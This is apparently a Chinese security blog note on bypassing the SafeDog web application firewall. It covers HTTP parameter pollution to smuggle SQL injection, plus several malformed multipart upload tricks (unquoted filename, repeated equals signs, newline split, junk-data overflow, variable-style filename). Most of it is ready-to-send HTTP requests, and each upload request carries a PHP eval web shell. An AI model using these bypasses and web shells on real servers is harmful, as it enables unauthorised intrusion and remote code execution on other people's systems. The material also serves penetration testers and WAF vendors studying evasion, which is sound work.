【笔记】安全狗绕过

发表于 更新于 阅读次数:

前言

安全狗(SafeDog)绕过

SQL注入绕过

参数污染原理

  • 在传递请求参数时,如果反复传递相同参数名的参数,则会造成参数污染,不同中间件对参数污染的处理结果不同

不同中间件的处理结果

中间件名 处理结果
ASP.NET/IIS x=1,2
ASP/IIS x=1,2
PHP/Apache x=2
JSP,Servlet/Apache,Tomcat x=1
JSP,Servlet/Oracle Application Server 10g x=1
JSP,Servlet/Jetty x=1
IBM Lotus Domino x=2
IBM HTTP Server x=1
Perl CGI/Apache x=1
Python/Zope x=[1,2]

利用参数污染绕过安全狗

  • 安全狗会检测第一个参数,发现是注释标记后不会继续检测

<sql>:用于注入的SQL语句

request
1
GET http://127.0.0.1:80/?id=1/**&id=<sql>*/

文件上传绕过

  • 原理:让安全狗误以为文件名是代码,从而绕过后缀名检测

不写引号绕过

  • 安全狗误以为文件名是对象.属性
request
1
2
3
4
5
6
7
8
9
POST http://127.0.0.1:80/upload.php HTTP/1.1
Content-Type: multipart/form-data;boundary=---------------------------000000000000000

---------------------------000000000000000
Content-Disposition: form-data;name="file";filename=payload.php
Content-Type: application/octet-stream

<?php eval($_REQUEST[x]);?>
---------------------------000000000000000--

双写等号绕过

  • 安全狗误以为=====是在布尔运算
request
1
2
3
4
5
6
7
8
9
POST http://127.0.0.1:80/upload.php HTTP/1.1
Content-Type: multipart/form-data;boundary=---------------------------000000000000000

---------------------------000000000000000
Content-Disposition: form-data;name="file";filename=="payload.php"
Content-Type: application/octet-stream

<?php eval($_REQUEST[x]);?>
---------------------------000000000000000--
request
1
2
3
4
5
6
7
8
9
POST http://127.0.0.1:80/upload.php HTTP/1.1
Content-Type: multipart/form-data;boundary=---------------------------000000000000000

---------------------------000000000000000
Content-Disposition: form-data;name="file";filename==="payload.php"
Content-Type: application/octet-stream

<?php eval($_REQUEST[x]);?>
---------------------------000000000000000--

换行绕过

  • 安全狗在扫描到换行符(0x0a 0x0d)时误以为扫描应当结束了
request
1
2
3
4
5
6
7
8
9
10
POST http://127.0.0.1:80/upload.php HTTP/1.1
Content-Type: multipart/form-data;boundary=---------------------------000000000000000

---------------------------000000000000000
Content-Disposition: form-data;name="file";filename="payload.ph
p"
Content-Type: application/octet-stream

<?php eval($_REQUEST[x]);?>
---------------------------000000000000000--

溢出绕过

  • 利用垃圾数据让数据超出安全狗可扫描的最大长度
request
1
2
3
4
5
6
7
8
9
POST http://127.0.0.1:80/upload.php HTTP/1.1
Content-Type: multipart/form-data;boundary=---------------------------000000000000000

---------------------------000000000000000
Content-Disposition: form-data;name="file";xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;filename="payload.php"
Content-Type: application/octet-stream

<?php eval($_REQUEST[x]);?>
---------------------------000000000000000--

已存在的变量作为文件名

  • 安全狗误以为是安全的变量从而不扫描
request
1
2
3
4
5
6
7
8
9
POST http://127.0.0.1:80/upload.php HTTP/1.1
Content-Type: multipart/form-data;boundary=---------------------------000000000000000

---------------------------000000000000000
Content-Disposition: form-data;name="file";filename='name="file.php'
Content-Type: application/octet-stream

<?php eval($_REQUEST[x]);?>
---------------------------000000000000000--

完成